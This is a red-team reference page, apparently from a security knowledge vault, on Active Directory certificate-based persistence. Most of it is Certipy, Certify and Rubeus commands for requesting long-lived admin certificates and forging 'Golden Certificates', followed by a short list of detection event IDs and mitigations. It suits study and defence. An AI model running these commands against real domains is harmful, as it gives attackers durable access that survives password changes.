attack-67-adcs-certificate-based-persistence.md (3486B)
1 --- 2 title: "Attack #67 β ADCS Certificate-Based Persistence" 3 description: "An attacker who has compromised a DA account can request a long-lived client authentication certificate for that account. Even after the DA password isβ¦" 4 category: active-directory 5 subcategory: "Persistence" 6 tags: ["active-directory", "adcs", "persistence", "hashing"] 7 tools: ["Rubeus", "Certipy", "Certify", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/π€ Attack #67 β ADCS Certificate-Based Persistence.md" 11 --- 12 # π€ Attack #67 β ADCS Certificate-Based Persistence 13 14 *** 15 16 ## π How It Works 17 18 An attacker who has compromised a DA account can **request a long-lived client authentication certificate** for that account. Even after the DA password is changed, the certificate remains valid for authentication via PKINIT β typically for 1 year or more. Combined with **Golden Certificate (#35)** (stealing the CA private key to forge unlimited certs), ADCS persistence is the strongest persistence mechanism in AD. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **DA or target user credentials** | To request a certificate | 27 | **ADCS deployed** | With Client Authentication templates available | 28 29 *** 30 31 ## π» Full Commands 32 33 ```bash 34 # ββ Request a long-lived cert as Administrator ββββββββββββββββββββββββββββββββ 35 certipy req -u Administrator@corp.local -p 'Password1' -ca CORP-CA \ 36 -template User -dc-ip 10.10.10.10 37 # Output: administrator.pfx (valid for template's configured lifetime, default 1 year) 38 39 # ββ Use cert after password change (months later) ββββββββββββββββββββββββββββ 40 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 41 # Returns current NT hash β even though password was changed 42 43 # ββ Golden Certificate (ultimate persistence β Attack #35) βββββββββββββββββββ 44 # Forge unlimited certificates using stolen CA key: 45 certipy forge -ca-pfx CORP-CA.pfx -upn Administrator@corp.local -subject "CN=Administrator" 46 certipy auth -pfx forged_administrator.pfx -dc-ip 10.10.10.10 47 ``` 48 49 ```powershell 50 # ββ Certify (Windows) βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 51 .\Certify.exe request /ca:CORP-CA /template:User 52 # Convert PEM to PFX, then use Rubeus for PKINIT: 53 .\Rubeus.exe asktgt /user:Administrator /certificate:admin.pfx /password:pass /ptt 54 ``` 55 56 *** 57 58 ## π‘οΈ Detection β Event IDs 59 60 | Event ID | Source | What to Look For | 61 |---|---|---| 62 | **4886** | Security Log (CA) | Certificate enrollment by admin account | 63 | **4768** | Security Log (DC) | PKINIT authentication β smart card logon for non-smart-card user | 64 65 *** 66 67 ## π Attack Chain Context 68 69 ``` 70 [ADCS Persistence] βββ Long-lived certificates survive password changes 71 β 72 ββββ π Cert valid 1+ year β outlasts password rotation policies 73 ββββ π Golden Certificate: forge unlimited certs = permanent access 74 ββββ π Defeated by: short cert lifetimes, CA key protection, cert revocation 75 ``` 76 77 *** 78 79 > β **Attack #67 β ADCS Certificate-Based Persistence complete.** 80 81 *** 82 83 > π **Category 8 β Persistence Techniques is now COMPLETE (7/7 attacks).**